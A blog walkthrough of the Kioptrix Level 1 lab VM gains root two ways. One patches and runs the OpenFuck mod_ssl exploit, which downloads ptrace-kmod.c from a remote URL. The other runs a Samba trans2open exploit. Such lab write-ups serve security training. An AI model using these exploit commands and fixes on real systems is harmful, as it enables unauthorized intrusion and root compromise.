Kioptrix: Level 1 Walkthrough

Rafael Medeiros
5 min readFeb 16, 2021

--

URL: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Release Date: 11 Feb 2011

Provided description: This Kioptrix VM Image are easy challenges. The objective of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

#Exploit 1

Let’s start with a basic enumeration using nmap scan:

nmap -sV -p- ipaddress

nmap scan

We found some interesting things here, we have Apache 1.3.20 running on both 80 and 443 with mod_ssl 2.8.4.

Let’s try nikto now:

nikto scan

As we can see on the screenshot at ‘1’, the machine is vulnerable to CVE-2002–0082, and searching on exploit-db.com we found the following exploit:

We have to compile it before run, but because it is a little bit old, we have to do some modifications in the code:

1) Add those headers :

#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

2) Update the URL of the C file.

Search for wget

and replace the URL with this new one :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get libssl-dev lib

Install them :

apt-get install libssl-dev

4) Update declaration of variables

Line 970, change it by adding const:

const unsigned char *p, *end;

5) Replace the “if” on (now) line 1078 with:

if (EVP_PKEY_get1_RSA(pkey) == NULL) {

6) Replace the “encrypted_key_length” code on (now) line 1084 with:

encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);

You can also find the updated exploit on my github if you don’t want to make all of these modifications:

https://github.com/RafaelM1994/InfoSec/blob/master/c_files/openfuck_updated.c

Compile the code with:

gcc -o openfuck openfuck_updated.c -lcrypto

Now that we have the code, we can run it for the first time and select the correct offset for the Apache version that is running on the victim server:

Knowing the offset, let’s run the command and get the root shell, the syntax is the following:

./openfuck 0x6b <victim’sIP> 443 -c 40

It’s worth noting that the victim’s machine needs to have internet connection, otherwise it won’t download the ptrace-kmod.c file to escalate privileges and you will end up with apache’s user instead of root.

#Exploit 2

As you may noticed, the server has 139 port open running samba, to find out if we can exploit it, we have to find its version. Unfortunately, because the vm is old, neither nmap nor smbclient could detect the version of this service, therefore we are going to use wireshark to do so.

First of all, since the machine is using old protocols, we have to enable NT1 on our machine to be able to establish a connection to SMB. Go to /etc/samba/smb.conf, and enable it:

sudo vim /etc/samba/smb.conf

You have to put the following under [global] settings:

client min protocol = NT1

Enabling NT1 Protocol

Note that this is not a secure approach, it’s recommended that you disable it after doing the tests.

Before testing the smb connection, open your wireshark and listen to the interface you are connecting to the server.

If you test the connection now, you are able to connect to the server successfully, but still can’t see its version:

smb connection

Stop wireshark packet capture and search for “Session Setup andX Response” packet, the packet’s source is the victim’s machine:

Expand the “Session Setup andX Response” section, and you’ll see the service version:

We got the version of this service, if we search a little bit, we come up with a vulnerability called CVE-2003-0201. It also has an exploit on exploi-db.com:

It’s a C file. Let’s compile it and run:

gcc -o smb smb.c -lcrypto

sudo ./smb -b 0 <victim’s ip> -v

Where -b is for bruteforce mode for linux, and -v is for verbose mode.

#Conclusion

These are the 2 ways I found to root this box. If you have any questions about any process, let me know in the comments.

References:

https://paulsec.github.io/posts/updating-openfuck-exploit/

https://hypn.za.net/blog/2017/08/27/compiling-exploit-764-c-in-2017/

https://www.reddit.com/r/oscp/comments/dvri1t/enumerating_samba_versions/

--

--

Rafael Medeiros
Rafael Medeiros

Written by Rafael Medeiros

DevOps Engineer | 3x Azure | Kubestronaut | Terraform Fanatic | Another IT Professional willing to help the community

No responses yet